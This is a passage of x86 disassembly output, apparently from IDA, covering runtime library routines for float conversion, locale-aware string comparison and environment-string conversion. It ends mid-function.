loc_42FD2C: ; CODE XREF: sub_42F990+386�j
mov cx, word ptr [ebp+var_C+2]
add cx, 1
mov word ptr [ebp+var_C+2], cx
loc_42FD38: ; CODE XREF: sub_42F990+39A�j
jmp short loc_42FD43
; ---------------------------------------------------------------------------
loc_42FD3A: ; CODE XREF: sub_42F990+36E�j
mov edx, [ebp+var_10+2]
add edx, 1
mov [ebp+var_10+2], edx
loc_42FD43: ; CODE XREF: sub_42F990:loc_42FD38�j
jmp short loc_42FD4E
; ---------------------------------------------------------------------------
loc_42FD45: ; CODE XREF: sub_42F990+361�j
mov eax, [ebp+var_14+2]
add eax, 1
mov [ebp+var_14+2], eax
loc_42FD4E: ; CODE XREF: sub_42F990+35B�j
; sub_42F990:loc_42FD43�j
mov ecx, [ebp+var_30]
and ecx, 0FFFFh
cmp ecx, 7FFFh
jl short loc_42FD93
mov edx, [ebp+var_2C]
and edx, 0FFFFh
neg edx
sbb edx, edx
and edx, 80000000h
add edx, 7FFF8000h
mov eax, [ebp+arg_0]
mov [eax+8], edx
mov ecx, [ebp+arg_0]
mov dword ptr [ecx+4], 0
mov edx, [ebp+arg_0]
mov dword ptr [edx], 0
jmp short loc_42FDC9
; ---------------------------------------------------------------------------
loc_42FD93: ; CODE XREF: sub_42F990+3CD�j
mov eax, [ebp+arg_0]
mov cx, word ptr [ebp+var_14+2]
mov [eax], cx
mov edx, [ebp+arg_0]
mov eax, [ebp+var_10]
mov [edx+2], eax
mov ecx, [ebp+arg_0]
mov edx, [ebp+var_C]
mov [ecx+6], edx
mov eax, [ebp+var_30]
and eax, 0FFFFh
mov ecx, [ebp+var_2C]
and ecx, 0FFFFh
or eax, ecx
mov edx, [ebp+arg_0]
mov [edx+0Ah], ax
loc_42FDC9: ; CODE XREF: sub_42F990+EF�j
; sub_42F990+122�j ...
mov esp, ebp
pop ebp
retn
sub_42F990 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FDD0 proc near ; CODE XREF: sub_42CB40+914�p
; sub_42D6C0+288�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 18h
mov eax, offset dword_4440E0
sub eax, 60h
mov [ebp+var_4], eax
cmp [ebp+arg_4], 0
jnz short loc_42FDEC
jmp loc_42FE8F
; ---------------------------------------------------------------------------
loc_42FDEC: ; CODE XREF: sub_42FDD0+15�j
cmp [ebp+arg_4], 0
jge short loc_42FE05
mov ecx, [ebp+arg_4]
neg ecx
mov [ebp+arg_4], ecx
mov edx, offset dword_444240
sub edx, 60h
mov [ebp+var_4], edx
loc_42FE05: ; CODE XREF: sub_42FDD0+20�j
cmp [ebp+arg_8], 0
jnz short loc_42FE13
mov eax, [ebp+arg_0]
mov word ptr [eax], 0
loc_42FE13: ; CODE XREF: sub_42FDD0+39�j
; sub_42FDD0+6A�j ...
cmp [ebp+arg_4], 0
jz short loc_42FE8F
mov ecx, [ebp+var_4]
add ecx, 54h
mov [ebp+var_4], ecx
mov edx, [ebp+arg_4]
and edx, 7
mov [ebp+var_18], edx
mov eax, [ebp+arg_4]
sar eax, 3
mov [ebp+arg_4], eax
cmp [ebp+var_18], 0
jnz short loc_42FE3C
jmp short loc_42FE13
; ---------------------------------------------------------------------------
loc_42FE3C: ; CODE XREF: sub_42FDD0+68�j
mov ecx, [ebp+var_18]
imul ecx, 0Ch
mov edx, [ebp+var_4]
add edx, ecx
mov [ebp+var_8], edx
mov eax, [ebp+var_8]
xor ecx, ecx
mov cx, [eax]
cmp ecx, 8000h
jl short loc_42FE7D
mov edx, [ebp+var_8]
mov eax, [edx]
mov [ebp+var_14], eax
mov ecx, [edx+4]
mov [ebp+var_10], ecx
mov edx, [edx+8]
mov [ebp+var_C], edx
mov eax, [ebp+var_14+2]
sub eax, 1
mov [ebp+var_14+2], eax
lea ecx, [ebp+var_14]
mov [ebp+var_8], ecx
loc_42FE7D: ; CODE XREF: sub_42FDD0+88�j
mov edx, [ebp+var_8]
push edx
mov eax, [ebp+arg_0]
push eax
call sub_42F990
add esp, 8
jmp short loc_42FE13
; ---------------------------------------------------------------------------
loc_42FE8F: ; CODE XREF: sub_42FDD0+17�j
; sub_42FDD0+47�j
mov esp, ebp
pop ebp
retn
sub_42FDD0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42FEA0 proc near ; CODE XREF: sub_42F050+19C�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433CF0
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_492400, 0
jnz short loc_42FF12
push 0
push 0
push 1
push 0
call ds:dword_4942A0
test eax, eax
jz short loc_42FEED
mov dword_492400, 1
jmp short loc_42FF12
; ---------------------------------------------------------------------------
loc_42FEED: ; CODE XREF: sub_42FEA0+3F�j
push 0
push 0
push 1
push 0
call ds:dword_4943F0
test eax, eax
jz short loc_42FF0B
mov dword_492400, 2
jmp short loc_42FF12
; ---------------------------------------------------------------------------
loc_42FF0B: ; CODE XREF: sub_42FEA0+5D�j
xor eax, eax
jmp loc_430021
; ---------------------------------------------------------------------------
loc_42FF12: ; CODE XREF: sub_42FEA0+2D�j
; sub_42FEA0+4B�j ...
cmp dword_492400, 1
jnz short loc_42FF36
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4942A0
jmp loc_430021
; ---------------------------------------------------------------------------
loc_42FF36: ; CODE XREF: sub_42FEA0+79�j
cmp dword_492400, 2
jnz loc_43001F
cmp [ebp+arg_10], 0
jnz short loc_42FF52
mov ecx, dword_492180
mov [ebp+arg_10], ecx
loc_42FF52: ; CODE XREF: sub_42FEA0+A7�j
push 0
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4943F0
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_42FF74
xor eax, eax
jmp loc_430021
; ---------------------------------------------------------------------------
loc_42FF74: ; CODE XREF: sub_42FEA0+CB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_28], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_28]
mov [ebp+var_20], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_42FFB4
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_42FFB4: ; CODE XREF: sub_42FEA0+FB�j
cmp [ebp+var_20], 0
jnz short loc_42FFBE
xor eax, eax
jmp short loc_430021
; ---------------------------------------------------------------------------
loc_42FFBE: ; CODE XREF: sub_42FEA0+118�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4943F0
test eax, eax
jnz short loc_42FFDC
xor eax, eax
jmp short loc_430021
; ---------------------------------------------------------------------------
loc_42FFDC: ; CODE XREF: sub_42FEA0+136�j
cmp [ebp+arg_C], 0
jnz short loc_42FFFD
push 0
push 0
push 0FFFFFFFFh
mov eax, [ebp+var_20]
push eax
push 1
mov ecx, [ebp+arg_10]
push ecx
call ds:dword_4942D4
mov [ebp+var_24], eax
jmp short loc_43001A
; ---------------------------------------------------------------------------
loc_42FFFD: ; CODE XREF: sub_42FEA0+140�j
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_20]
push ecx
push 1
mov edx, [ebp+arg_10]
push edx
call ds:dword_4942D4
mov [ebp+var_24], eax
loc_43001A: ; CODE XREF: sub_42FEA0+15B�j
mov eax, [ebp+var_24]
jmp short loc_430021
; ---------------------------------------------------------------------------
loc_43001F: ; CODE XREF: sub_42FEA0+9D�j
xor eax, eax
loc_430021: ; CODE XREF: sub_42FEA0+6D�j
; sub_42FEA0+91�j ...
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_42FEA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430040 proc near ; CODE XREF: sub_42F050+4B�p
; sub_42F050+7E�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433D00
push offset sub_425F84
loc_43004F: ; DATA XREF: .data:00434550�o
; .data:00434564�o
mov eax, large fs:0
push eax
loc_430056: ; DATA XREF: .data:off_4343F4�o
; .data:00434AB8�o
mov large fs:0, esp
add esp, 0FFFFFFE8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_492404, 0
jnz short loc_4300B2
push 0
push 0
push 1
push 0
call ds:dword_4942A0
test eax, eax
jz short loc_43008D
mov dword_492404, 1
jmp short loc_4300B2
; ---------------------------------------------------------------------------
loc_43008D: ; CODE XREF: sub_430040+3F�j
push 0
push 0
push 1
push 0
call ds:dword_4943F0
test eax, eax
jz short loc_4300AB
mov dword_492404, 2
jmp short loc_4300B2
; ---------------------------------------------------------------------------
loc_4300AB: ; CODE XREF: sub_430040+5D�j
xor eax, eax
jmp loc_4301D1
; ---------------------------------------------------------------------------
loc_4300B2: ; CODE XREF: sub_430040+2D�j
; sub_430040+4B�j ...
cmp dword_492404, 2
jnz short loc_4300D6
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4943F0
jmp loc_4301D1
; ---------------------------------------------------------------------------
loc_4300D6: ; CODE XREF: sub_430040+79�j
cmp dword_492404, 1
jnz loc_4301CF
cmp [ebp+arg_10], 0
jnz short loc_4300F2
mov ecx, dword_492180
mov [ebp+arg_10], ecx
loc_4300F2: ; CODE XREF: sub_430040+A7�j
push 0
push 0
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_4942A0
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_430114
xor eax, eax
jmp loc_4301D1
; ---------------------------------------------------------------------------
loc_430114: ; CODE XREF: sub_430040+CB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_28], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_28]
mov [ebp+var_20], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_430156
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_20], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_430156: ; CODE XREF: sub_430040+FD�j
cmp [ebp+var_20], 0
jnz short loc_430160
xor eax, eax
jmp short loc_4301D1
; ---------------------------------------------------------------------------
loc_430160: ; CODE XREF: sub_430040+11A�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_20]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call ds:dword_4942A0
test eax, eax
jnz short loc_43017E
xor eax, eax
jmp short loc_4301D1
; ---------------------------------------------------------------------------
loc_43017E: ; CODE XREF: sub_430040+138�j
cmp [ebp+arg_C], 0
jnz short loc_4301A6
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
mov eax, [ebp+var_20]
push eax
push 220h
mov ecx, [ebp+arg_10]
push ecx
call ds:dword_4943B0
mov [ebp+var_24], eax
jmp short loc_4301CA
; ---------------------------------------------------------------------------
loc_4301A6: ; CODE XREF: sub_430040+142�j
push 0
push 0
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_20]
push ecx
push 220h
mov edx, [ebp+arg_10]
push edx
call ds:dword_4943B0
mov [ebp+var_24], eax
loc_4301CA: ; CODE XREF: sub_430040+164�j
mov eax, [ebp+var_24]
jmp short loc_4301D1
; ---------------------------------------------------------------------------
loc_4301CF: ; CODE XREF: sub_430040+9D�j
xor eax, eax
loc_4301D1: ; CODE XREF: sub_430040+6D�j
; sub_430040+91�j ...
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_430040 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4301F0 proc near ; CODE XREF: sub_42F770+9B�p
; sub_430A20+2D�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ecx
cmp [ebp+arg_8], 0
jnz short loc_4301FE
xor eax, eax
jmp short loc_43023B
; ---------------------------------------------------------------------------
loc_4301FE: ; CODE XREF: sub_4301F0+8�j
mov eax, dword_492524
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_8]
push eax
mov ecx, [ebp+arg_0]
push ecx
push 1
mov edx, dword_492744
push edx
call sub_4302F0
add esp, 1Ch
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jnz short loc_430235
mov eax, 7FFFFFFFh
jmp short loc_43023B
; ---------------------------------------------------------------------------
loc_430235: ; CODE XREF: sub_4301F0+3C�j
mov eax, [ebp+var_4]
sub eax, 2
loc_43023B: ; CODE XREF: sub_4301F0+C�j
; sub_4301F0+43�j
mov esp, ebp
pop ebp
retn
sub_4301F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430240 proc near ; CODE XREF: sub_42F770+2D�p
; sub_430740+81�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_4920B8
mov [ebp+var_4], eax
loc_43024E: ; CODE XREF: sub_430240+A3�j
mov ecx, [ebp+var_4]
cmp dword ptr [ecx], 0
jz loc_4302E8
push 0
push 0
push 0
push 0
push 0FFFFFFFFh
mov edx, [ebp+var_4]
mov eax, [edx]
push eax
push 0
push 1
call ds:dword_4943B0
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_430282
or eax, 0FFFFFFFFh
jmp short loc_4302EA
; ---------------------------------------------------------------------------
loc_430282: ; CODE XREF: sub_430240+3B�j
push 3Dh
push offset aWtombenv_c ; "wtombenv.c"
push 2
mov ecx, [ebp+var_C]
push ecx
call sub_416A30
add esp, 10h
mov [ebp+var_8], eax
cmp [ebp+var_8], 0
jnz short loc_4302A5
or eax, 0FFFFFFFFh
jmp short loc_4302EA
; ---------------------------------------------------------------------------
loc_4302A5: ; CODE XREF: sub_430240+5E�j
push 0
push 0
mov edx, [ebp+var_C]
push edx
mov eax, [ebp+var_8]
push eax
push 0FFFFFFFFh
mov ecx, [ebp+var_4]
mov edx, [ecx]
push edx
push 0
push 1
call ds:dword_4943B0
test eax, eax
jnz short loc_4302CC
or eax, 0FFFFFFFFh
jmp short loc_4302EA
; ---------------------------------------------------------------------------
loc_4302CC: ; CODE XREF: sub_430240+85�j
push 0
mov eax, [ebp+var_8]
push eax
call sub_430740
add esp, 8
mov ecx, [ebp+var_4]
add ecx, 4
mov [ebp+var_4], ecx
jmp loc_43024E
; ---------------------------------------------------------------------------
loc_4302E8: ; CODE XREF: sub_430240+14�j
xor eax, eax
loc_4302EA: ; CODE XREF: sub_430240+40�j
; sub_430240+63�j ...
mov esp, ebp
pop ebp
retn
sub_430240 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4302F0 proc near ; CODE XREF: sub_4301F0+2D�p
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_36 = byte ptr -36h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_433D60
push offset sub_425F84
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFC8h
push ebx
push esi
push edi
mov [ebp+var_18], esp
cmp dword_492408, 0
jnz short loc_430376
push 1
push offset dword_43301C
push 1
push offset dword_43301C
push 0
push 0
call ds:dword_494298
test eax, eax
jz short loc_430347
mov dword_492408, 1
jmp short loc_430376
; ---------------------------------------------------------------------------
loc_430347: ; CODE XREF: sub_4302F0+49�j
push 1
push offset dword_433018
push 1
push offset dword_433018
push 0
push 0
call ds:dword_49429C
test eax, eax
jz short loc_43036F
mov dword_492408, 2
jmp short loc_430376
; ---------------------------------------------------------------------------
loc_43036F: ; CODE XREF: sub_4302F0+71�j
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430376: ; CODE XREF: sub_4302F0+2D�j
; sub_4302F0+55�j ...
cmp [ebp+arg_C], 0
jle short loc_43038F
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
call sub_4306F0
add esp, 8
mov [ebp+arg_C], eax
loc_43038F: ; CODE XREF: sub_4302F0+8A�j
cmp [ebp+arg_14], 0
jle short loc_4303A8
mov edx, [ebp+arg_14]
push edx
mov eax, [ebp+arg_10]
push eax
call sub_4306F0
add esp, 8
mov [ebp+arg_14], eax
loc_4303A8: ; CODE XREF: sub_4302F0+A3�j
cmp dword_492408, 2
jnz short loc_4303D4
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+arg_8]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_49429C
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_4303D4: ; CODE XREF: sub_4302F0+BF�j
cmp dword_492408, 1
jnz loc_4306D2
cmp [ebp+arg_18], 0
jnz short loc_4303F0
mov ecx, dword_492180
mov [ebp+arg_18], ecx
loc_4303F0: ; CODE XREF: sub_4302F0+F5�j
cmp [ebp+arg_C], 0
jz short loc_430400
cmp [ebp+arg_14], 0
jnz loc_43057C
loc_430400: ; CODE XREF: sub_4302F0+104�j
mov edx, [ebp+arg_C]
cmp edx, [ebp+arg_14]
jnz short loc_430412
mov eax, 2
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430412: ; CODE XREF: sub_4302F0+116�j
cmp [ebp+arg_14], 1
jle short loc_430422
mov eax, 1
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430422: ; CODE XREF: sub_4302F0+126�j
cmp [ebp+arg_C], 1
jle short loc_430432
mov eax, 3
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430432: ; CODE XREF: sub_4302F0+136�j
lea eax, [ebp+var_3C]
push eax
mov ecx, [ebp+arg_18]
push ecx
call ds:dword_49447C
test eax, eax
jnz short loc_43044B
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_43044B: ; CODE XREF: sub_4302F0+152�j
; sub_4302F0+198�j
cmp [ebp+arg_C], 0
jnz short loc_430457
cmp [ebp+arg_14], 1
jz short loc_430484
loc_430457: ; CODE XREF: sub_4302F0+15F�j
cmp [ebp+arg_C], 1
jnz short loc_430463
cmp [ebp+arg_14], 0
jz short loc_430484
loc_430463: ; CODE XREF: sub_4302F0+16B�j
push offset aCchcount10Cchc ; "cchCount1==0 && cchCount2==1 || cchCoun"...
push 0
push 0B6h
push offset aA_cmp_c ; "a_cmp.c"
push 2
call sub_41BF80
add esp, 14h
cmp eax, 1
jnz short loc_430484
int 3 ; Trap to Debugger
loc_430484: ; CODE XREF: sub_4302F0+165�j
; sub_4302F0+171�j ...
xor edx, edx
test edx, edx
jnz short loc_43044B
cmp [ebp+arg_C], 0
jle short loc_430503
cmp [ebp+var_3C], 2
jnb short loc_4304A0
mov eax, 3
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_4304A0: ; CODE XREF: sub_4302F0+1A4�j
lea eax, [ebp+var_36]
mov [ebp+var_40], eax
jmp short loc_4304B1
; ---------------------------------------------------------------------------
loc_4304A8: ; CODE XREF: sub_4302F0:loc_4304F7�j
mov ecx, [ebp+var_40]
add ecx, 2
mov [ebp+var_40], ecx
loc_4304B1: ; CODE XREF: sub_4302F0+1B6�j
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx]
test eax, eax
jz short loc_4304F9
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx+1]
test edx, edx
jz short loc_4304F9
mov eax, [ebp+arg_8]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx]
cmp ecx, eax
jl short loc_4304F7
mov ecx, [ebp+arg_8]
xor edx, edx
mov dl, [ecx]
mov eax, [ebp+var_40]
xor ecx, ecx
mov cl, [eax+1]
cmp edx, ecx
jg short loc_4304F7
mov eax, 2
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_4304F7: ; CODE XREF: sub_4302F0+1E8�j
; sub_4302F0+1FB�j
jmp short loc_4304A8
; ---------------------------------------------------------------------------
loc_4304F9: ; CODE XREF: sub_4302F0+1CA�j
; sub_4302F0+1D6�j
mov eax, 3
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430503: ; CODE XREF: sub_4302F0+19E�j
cmp [ebp+arg_14], 0
jle short loc_43057C
cmp [ebp+var_3C], 2
jnb short loc_430519
mov eax, 1
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430519: ; CODE XREF: sub_4302F0+21D�j
lea edx, [ebp+var_36]
mov [ebp+var_40], edx
jmp short loc_43052A
; ---------------------------------------------------------------------------
loc_430521: ; CODE XREF: sub_4302F0:loc_430570�j
mov eax, [ebp+var_40]
add eax, 2
mov [ebp+var_40], eax
loc_43052A: ; CODE XREF: sub_4302F0+22F�j
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx]
test edx, edx
jz short loc_430572
mov eax, [ebp+var_40]
xor ecx, ecx
mov cl, [eax+1]
test ecx, ecx
jz short loc_430572
mov edx, [ebp+arg_10]
xor eax, eax
mov al, [edx]
mov ecx, [ebp+var_40]
xor edx, edx
mov dl, [ecx]
cmp eax, edx
jl short loc_430570
mov eax, [ebp+arg_10]
xor ecx, ecx
mov cl, [eax]
mov edx, [ebp+var_40]
xor eax, eax
mov al, [edx+1]
cmp ecx, eax
jg short loc_430570
mov eax, 2
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430570: ; CODE XREF: sub_4302F0+261�j
; sub_4302F0+274�j
jmp short loc_430521
; ---------------------------------------------------------------------------
loc_430572: ; CODE XREF: sub_4302F0+243�j
; sub_4302F0+24F�j
mov eax, 1
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_43057C: ; CODE XREF: sub_4302F0+10A�j
; sub_4302F0+217�j
push 0
push 0
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 9
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jnz short loc_4305A4
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_4305A4: ; CODE XREF: sub_4302F0+2AB�j
mov [ebp+var_4], 0
mov eax, [ebp+var_1C]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_44], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_44]
mov [ebp+var_24], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_4305E6
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_24], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_4305E6: ; CODE XREF: sub_4302F0+2DD�j
cmp [ebp+var_24], 0
jnz short loc_4305F3
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_4305F3: ; CODE XREF: sub_4302F0+2FA�j
mov edx, [ebp+var_1C]
push edx
mov eax, [ebp+var_24]
push eax
mov ecx, [ebp+arg_C]
push ecx
mov edx, [ebp+arg_8]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
test eax, eax
jnz short loc_43061A
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_43061A: ; CODE XREF: sub_4302F0+321�j
push 0
push 0
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
push 9
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
mov [ebp+var_20], eax
cmp [ebp+var_20], 0
jnz short loc_430642
xor eax, eax
jmp loc_4306D4
; ---------------------------------------------------------------------------
loc_430642: ; CODE XREF: sub_4302F0+349�j
mov [ebp+var_4], 1
mov eax, [ebp+var_20]
shl eax, 1
add eax, 3
and al, 0FCh
call sub_418D40
mov [ebp+var_48], esp
mov [ebp+var_18], esp
mov ecx, [ebp+var_48]
mov [ebp+var_28], ecx
mov [ebp+var_4], 0FFFFFFFFh
jmp short loc_430684
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
mov [ebp+var_28], 0
mov [ebp+var_4], 0FFFFFFFFh
loc_430684: ; CODE XREF: sub_4302F0+37B�j
cmp [ebp+var_28], 0
jnz short loc_43068E
xor eax, eax
jmp short loc_4306D4
; ---------------------------------------------------------------------------
loc_43068E: ; CODE XREF: sub_4302F0+398�j
mov edx, [ebp+var_20]
push edx
mov eax, [ebp+var_28]
push eax
mov ecx, [ebp+arg_14]
push ecx
mov edx, [ebp+arg_10]
push edx
push 1
mov eax, [ebp+arg_18]
push eax
call ds:dword_4942D4
test eax, eax
jnz short loc_4306B2
xor eax, eax
jmp short loc_4306D4
; ---------------------------------------------------------------------------
loc_4306B2: ; CODE XREF: sub_4302F0+3BC�j
mov ecx, [ebp+var_20]
push ecx
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_1C]
push eax
mov ecx, [ebp+var_24]
push ecx
mov edx, [ebp+arg_4]
push edx
mov eax, [ebp+arg_0]
push eax
call ds:dword_494298
jmp short loc_4306D4
; ---------------------------------------------------------------------------
loc_4306D2: ; CODE XREF: sub_4302F0+EB�j
xor eax, eax
loc_4306D4: ; CODE XREF: sub_4302F0+81�j
; sub_4302F0+DF�j ...
lea esp, [ebp-54h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_4302F0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4306F0 proc near ; CODE XREF: sub_4302F0+94�p
; sub_4302F0+AD�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
mov [ebp+var_8], eax
mov ecx, [ebp+arg_0]
mov [ebp+var_4], ecx
loc_430702: ; CODE XREF: sub_4306F0+35�j
mov edx, [ebp+var_8]
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
test edx, edx
jz short loc_430727
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jz short loc_430727
mov eax, [ebp+var_4]
add eax, 1
mov [ebp+var_4], eax
jmp short loc_430702
; ---------------------------------------------------------------------------
loc_430727: ; CODE XREF: sub_4306F0+20�j
; sub_4306F0+2A�j
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
test edx, edx
jnz short loc_430739
mov eax, [ebp+var_4]
sub eax, [ebp+arg_0]
jmp short loc_43073C
; ---------------------------------------------------------------------------
loc_430739: ; CODE XREF: sub_4306F0+3F�j
mov eax, [ebp+arg_4]
loc_43073C: ; CODE XREF: sub_4306F0+47�j
mov esp, ebp
pop ebp
retn
sub_4306F0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430740 proc near ; CODE XREF: sub_430240+92�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
